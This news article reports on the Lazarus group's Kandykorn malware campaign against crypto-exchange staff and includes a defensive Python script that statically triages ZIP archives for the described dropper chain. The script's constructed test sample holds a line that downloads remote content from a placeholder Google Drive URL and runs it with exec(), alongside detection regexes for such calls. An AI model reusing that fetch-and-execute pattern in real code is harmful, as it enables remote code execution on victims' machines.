Research by Elastic Security Labs has identified a new malware campaign attributed to the notorious Lazarus cybercrime group.
The malware, called Kandykorn, targets the cryptocurrency sector. According to the data the researchers collected, the North Korean hackers approached people working at crypto exchanges through Discord.
There they lured potential victims with a supposed bot that would facilitate profitable trading. The downloaded "bot" is actually a ZIP archive containing a file to execute named Main.py, which in turn introduces a malicious file named Watcher.py.
That file then connects to a Google Drive account and downloads further malicious files, including an additional component called Sugarloader which, although not malware in itself, poses a danger to victims.
It is, in fact, a loader capable of bypassing anti-malware checks and facilitating the subsequent download of the actual malware.
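The staged chain described above (a ZIP, a launcher script, a second-stage script, a download from Google Drive) can be triaged statically before anything is run. The following is an added example written for this article; it is not code from Elastic Security Labs and not the campaign's own tooling. It assumes the public Google Drive download hostnames, a small set of Python download and execution calls as indicators, and a constructed sample archive that merely mimics the layout the article describes.

```python
import io
import re
import zipfile

# Indicators drawn from the infection chain described in the article:
# a ZIP carrying Main.py, which hands off to Watcher.py, which pulls further
# payloads from Google Drive. The hostnames are the public Google Drive
# download hosts (assumption); the file names come from the article.
DRIVE_HOSTS = ("drive.google.com", "docs.google.com")
DOWNLOAD_CALLS = re.compile(r"\b(urllib\.request\.urlopen|urlretrieve|requests\.get)\b")
EXEC_CALLS = re.compile(r"\b(exec|eval|subprocess\.(?:run|Popen|call)|os\.system)\s*\(")
STAGE_FILES = ("Main.py", "Watcher.py")


def scan_python_source(name, source):
    """Return the indicator strings found in one Python file's source text."""
    findings = []
    if any(host in source for host in DRIVE_HOSTS):
        findings.append(f"{name}: references Google Drive download host")
    if DOWNLOAD_CALLS.search(source):
        findings.append(f"{name}: performs HTTP download")
    if EXEC_CALLS.search(source):
        findings.append(f"{name}: executes code or spawns a process")
    for other in STAGE_FILES:
        if other != name and other in source:
            findings.append(f"{name}: hands off to {other}")
    return findings


def triage_zip(data):
    """Scan every .py member of a ZIP (raw bytes) without executing anything.

    Returns (findings, suspicious). The verdict is only raised when the whole
    chain is present: both stage files, a remote download host, and execution.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        members = zf.namelist()
        for member in members:
            if member.endswith(".py"):
                source = zf.read(member).decode("utf-8", errors="replace")
                findings.extend(scan_python_source(member.rsplit("/", 1)[-1], source))
    basenames = {m.rsplit("/", 1)[-1] for m in members}
    chain = set(STAGE_FILES) <= basenames
    remote = any("Google Drive" in f for f in findings)
    executes = any("executes" in f for f in findings)
    return findings, (chain and remote and executes)


def build_constructed_sample():
    """Constructed sample archive for demonstration only; not the real dropper."""
    main_py = "import subprocess\nsubprocess.run(['python3', 'Watcher.py'])\n"
    watcher_py = (
        "import urllib.request\n"
        "data = urllib.request.urlopen('https://drive.google.com/uc?id=PLACEHOLDER').read()\n"
        "exec(data)\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("bot/Main.py", main_py)
        zf.writestr("bot/Watcher.py", watcher_py)
    return buf.getvalue()


def build_benign_sample():
    """Constructed harmless archive used as a negative control."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("bot/bot.py", "print('hello')\n")
    return buf.getvalue()


if __name__ == "__main__":
    findings, suspicious = triage_zip(build_constructed_sample())
    for finding in findings:
        print(finding)
    print("verdict:", "suspicious" if suspicious else "no chain match")
```

The point of the verdict logic is that any single indicator (a Google Drive URL, a call to `exec`) is common in legitimate scripts; what makes this archive worth escalating is the combination the article describes, a launcher that hands off to a second script which fetches and executes remote content.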
Kandykorn offers cybercriminals plenty of leeway
Once Sugarloader has downloaded Kandykorn, the actual infection begins.
The malware contains numerous functions that the remote server can invoke to perform various malicious activities. For example, the command “0xD3” can be used to obtain a listing of a folder's contents on the victim’s computer, while the command “resp_file_down” can be used to transfer any of the victim’s files to the attacker’s computer.
Elastic believes the attack began in April 2023. It says the toolset is likely still being used to carry out attacks today, stating: “This threat is still active and the tools and techniques are continuously updated”.
Centralized cryptocurrency exchanges and wallets have suffered a wave of attacks in 2023. Among the platforms caught up, through no fault of their own, in these campaigns are well-known names in the sector such as Alphapo, CoinsPaid, Atomic Wallet, Coinex, Stake and many others.